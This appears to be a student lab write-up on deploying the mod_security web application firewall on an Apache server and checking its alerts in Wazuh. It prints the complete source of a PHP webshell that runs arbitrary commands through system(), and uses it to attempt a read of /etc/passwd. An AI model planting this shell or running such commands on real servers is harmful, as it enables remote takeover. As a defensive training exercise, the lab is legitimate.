Lab 5.1 Wazuh WAF
Adding software to web01
WAN-to-DMZIf not already present, we need to add a new permanent rule to vyos such that established connections from the DMZ-to-WAN are allowed back through the WAN-to-DMZ firewall. If that rule (typically rule 1) is not there, add it.
DMZ-to-WANMake a rule to allow all traffic (temporaily)
set firewall name DMZ-to-WAN default-action accept set firewall name WAN-to-DMZ default-action accept
Adding mod_security, the core rule set and php to web01
The following command will install mod_security, the core ruleset associated with this layer 7 firewall and the php necessary to make a webshell work
sudo yum update
sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -yOnce you have installed mod_security get rid of your firewall rule
set firewall name DMZ-to-WAN default-action drop
set firewall name WAN-to-DMZ default-action dropDeliverable 1. Restart httpd on web01. Provide two screenshots similar to the ones below that shows that the security2_module is loaded.
Restart httpd
sudo systemctl restart httpdRun the following commands to show that security2_module is loaded
sudo httpd -M | grep security2This command is used to list the loaded Apache modules (
httpd -M) and then filter (grep) the output to show only the modules related tosecurity2. Thesecurity2module typically refers tomod_security, which is an Apache module that provides web application firewall (WAF) functionalities. Therefore,sudo httpd -M | grep security2will display information about whether themod_securitymodule is loaded in your Apache server configuration.
cd /etc/httpdlsand you should be able to see the modsecurity files
You can find the apache (httpd) error log in
/var/log/httpd/error_logOnce in the
/var/logdirectory, run the following command:
sudo cat httpd/error_log | grep ModSecurity
Testing ModSecurity
Deliverable 2. Provide a screenshot showing that you can get to web01 from rw01. Make sure you show your are on rw01 (hostname).
I copied my orginal index.html to index.txt in the /var/www/html directory just in case I wanted to use it again, but not delete it.
Download a php webshell to /var/www/html/shell.php on web01
The one below is from this website
You can either manually copy/paste it into a file or use wget to import the file
If you use the wget method, you will need to enable traffic on the firewall
Make sure to wget the raw code
I used the
mvcommand to change the name of the original file downloaded from the link above to change the name toshell.php
Below is what is in the
shell.phpfile:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>Deliverable 3. Use the php webshell to execute a command like ifconfig, hostname or whoami. Provide a screenshot showing remote code execution like the one below. You may need to be explicit about the path of the program you wish to run
/sbin/ifconfig
hostname
whoami
Deliverable 4. provide a screenshot that shows what happens when you attempt to run the following command within your webshell.
When I run, cat /etc/passwd I get an HTTP error saying I am forbidden to access this resource
Deliverable 5. Find the error or warning associated with Deliverable 4 in the apache error_log. Provide a screenshot.
sudo /var/log/httpd/error_log | grep /etc/passwd
Deliverable 6. Find the same alert in wazuh, provide a screenshot similar to the one below. You will see two types of events. 404 events directly from the apache logs but you should see some modsecurity events as well.
These logs don't say /etc/passwd in them, but I know they are the logs from my failed attempt at catting /etc/passwd since I did it a bunch of times in a row and many more logs showed up.
Last updated